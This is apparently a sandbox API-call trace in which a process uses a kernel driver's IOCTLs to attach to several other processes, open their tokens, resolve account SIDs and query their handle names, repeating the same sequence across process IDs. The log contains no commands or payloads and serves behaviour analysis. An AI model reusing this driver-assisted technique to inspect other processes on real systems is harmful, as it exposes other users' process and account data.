[0225.507] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.508] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.802] CloseHandle (hObject=0xc4) returned 1 [0225.802] CloseHandle (hObject=0xc8) returned 1 [0225.802] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.802] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.802] PsLookupProcessByProcessId (in: ProcessId=0x434, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.802] PsAcquireProcessExitSynchronization () returned 0x0 [0225.802] KeStackAttachProcess (in: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880052b35d0) [0225.803] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e8df20, HandleInformation=0x0) returned 0x0 [0225.803] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.803] PsReleaseProcessExitSynchronization () returned 0x2 [0225.803] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x12 [0225.803] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.803] ObfDereferenceObject (Object=0xfffffa8001e8df20) returned 0x1 [0225.803] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.803] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.803] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0225.803] PsLookupProcessByProcessId (in: ProcessId=0x434, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.803] PsAcquireProcessExitSynchronization () returned 0x0 [0225.803] KeStackAttachProcess (in: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880052b35d0) [0225.803] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ef3cd0, HandleInformation=0x0) returned 0x0 [0225.803] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.804] PsReleaseProcessExitSynchronization () returned 0x2 [0225.804] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x12 [0225.804] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.804] ObfDereferenceObject (Object=0xfffffa8001ef3cd0) returned 0x1 [0225.804] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.804] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.804] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.804] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.804] PsLookupProcessByProcessId (in: ProcessId=0x434, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.804] PsAcquireProcessExitSynchronization () returned 0x0 [0225.804] KeStackAttachProcess (in: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880052b35d0) [0225.804] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.804] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.804] PsReleaseProcessExitSynchronization () returned 0x2 [0225.804] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x12 [0225.804] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.804] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.804] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.804] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a8) returned 0xc8 [0225.804] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.805] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002017b30, HandleInformation=0x0) returned 0x0 [0225.805] ObOpenObjectByPointer (in: Object=0xfffffa8002017b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.805] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x14 [0225.805] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003441340 | out: TokenHandle=0xfffffa8003441340*=0xc4) returned 0x0 [0225.805] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.805] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.805] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.805] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.808] CloseHandle (hObject=0xc4) returned 1 [0225.808] CloseHandle (hObject=0xc8) returned 1 [0225.808] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.808] PsLookupProcessByProcessId (in: ProcessId=0x7a8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.808] PsAcquireProcessExitSynchronization () returned 0x0 [0225.808] KeStackAttachProcess (in: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880052b35d0) [0225.808] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002019f20, HandleInformation=0x0) returned 0x0 [0225.808] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.809] PsReleaseProcessExitSynchronization () returned 0x2 [0225.809] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x12 [0225.809] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.809] ObfDereferenceObject (Object=0xfffffa8002019f20) returned 0x1 [0225.809] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.809] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.809] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0225.809] PsLookupProcessByProcessId (in: ProcessId=0x7a8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.809] PsAcquireProcessExitSynchronization () returned 0x0 [0225.809] KeStackAttachProcess (in: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880052b35d0) [0225.809] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002019a60, HandleInformation=0x0) returned 0x0 [0225.809] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.809] PsReleaseProcessExitSynchronization () returned 0x2 [0225.809] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x12 [0225.809] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.809] ObfDereferenceObject (Object=0xfffffa8002019a60) returned 0x1 [0225.809] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.809] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.809] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.810] PsLookupProcessByProcessId (in: ProcessId=0x7a8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.810] PsAcquireProcessExitSynchronization () returned 0x0 [0225.810] KeStackAttachProcess (in: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880052b35d0) [0225.810] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.810] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.810] PsReleaseProcessExitSynchronization () returned 0x2 [0225.810] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x12 [0225.810] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.810] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.810] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.810] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x564) returned 0xc8 [0225.810] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.810] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002026b30, HandleInformation=0x0) returned 0x0 [0225.810] ObOpenObjectByPointer (in: Object=0xfffffa8002026b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.810] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x14 [0225.810] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003441340 | out: TokenHandle=0xfffffa8003441340*=0xc4) returned 0x0 [0225.811] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.811] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.811] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.811] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.813] CloseHandle (hObject=0xc4) returned 1 [0225.813] CloseHandle (hObject=0xc8) returned 1 [0225.813] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.813] PsLookupProcessByProcessId (in: ProcessId=0x564, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.813] PsAcquireProcessExitSynchronization () returned 0x0 [0225.813] KeStackAttachProcess (in: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880052b35d0) [0225.813] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e7ef20, HandleInformation=0x0) returned 0x0 [0225.813] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.813] PsReleaseProcessExitSynchronization () returned 0x2 [0225.814] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x12 [0225.814] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.814] ObfDereferenceObject (Object=0xfffffa8001e7ef20) returned 0x1 [0225.814] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.814] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.814] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.814] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0225.814] PsLookupProcessByProcessId (in: ProcessId=0x564, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.814] PsAcquireProcessExitSynchronization () returned 0x0 [0225.814] KeStackAttachProcess (in: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880052b35d0) [0225.814] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002028c20, HandleInformation=0x0) returned 0x0 [0225.814] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.814] PsReleaseProcessExitSynchronization () returned 0x2 [0225.814] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x12 [0225.814] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.814] ObfDereferenceObject (Object=0xfffffa8002028c20) returned 0x1 [0225.814] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.814] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.814] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.814] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.815] PsLookupProcessByProcessId (in: ProcessId=0x564, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.815] PsAcquireProcessExitSynchronization () returned 0x0 [0225.815] KeStackAttachProcess (in: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880052b35d0) [0225.815] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.815] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.815] PsReleaseProcessExitSynchronization () returned 0x2 [0225.815] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x12 [0225.815] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.815] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.815] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.815] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xc8 [0225.815] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.815] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800202ea70, HandleInformation=0x0) returned 0x0 [0225.815] ObOpenObjectByPointer (in: Object=0xfffffa800202ea70, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.815] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x14 [0225.815] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8003441340 | out: TokenHandle=0xfffffa8003441340*=0xc4) returned 0x0 [0225.815] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.816] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.816] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.816] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.818] CloseHandle (hObject=0xc4) returned 1 [0225.818] CloseHandle (hObject=0xc8) returned 1 [0225.818] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.818] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.818] PsLookupProcessByProcessId (in: ProcessId=0x560, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.818] PsAcquireProcessExitSynchronization () returned 0x0 [0225.818] KeStackAttachProcess (in: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880052b35d0) [0225.818] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002031700, HandleInformation=0x0) returned 0x0 [0225.818] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.818] PsReleaseProcessExitSynchronization () returned 0x2 [0225.818] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x12 [0225.818] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.818] ObfDereferenceObject (Object=0xfffffa8002031700) returned 0x1 [0225.818] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.819] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.819] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.819] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0225.819] PsLookupProcessByProcessId (in: ProcessId=0x560, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.819] PsAcquireProcessExitSynchronization () returned 0x0 [0225.819] KeStackAttachProcess (in: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880052b35d0) [0225.819] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002028200, HandleInformation=0x0) returned 0x0 [0225.819] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.819] PsReleaseProcessExitSynchronization () returned 0x2 [0225.819] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x12 [0225.819] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.819] ObfDereferenceObject (Object=0xfffffa8002028200) returned 0x1 [0225.819] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.819] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.819] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) 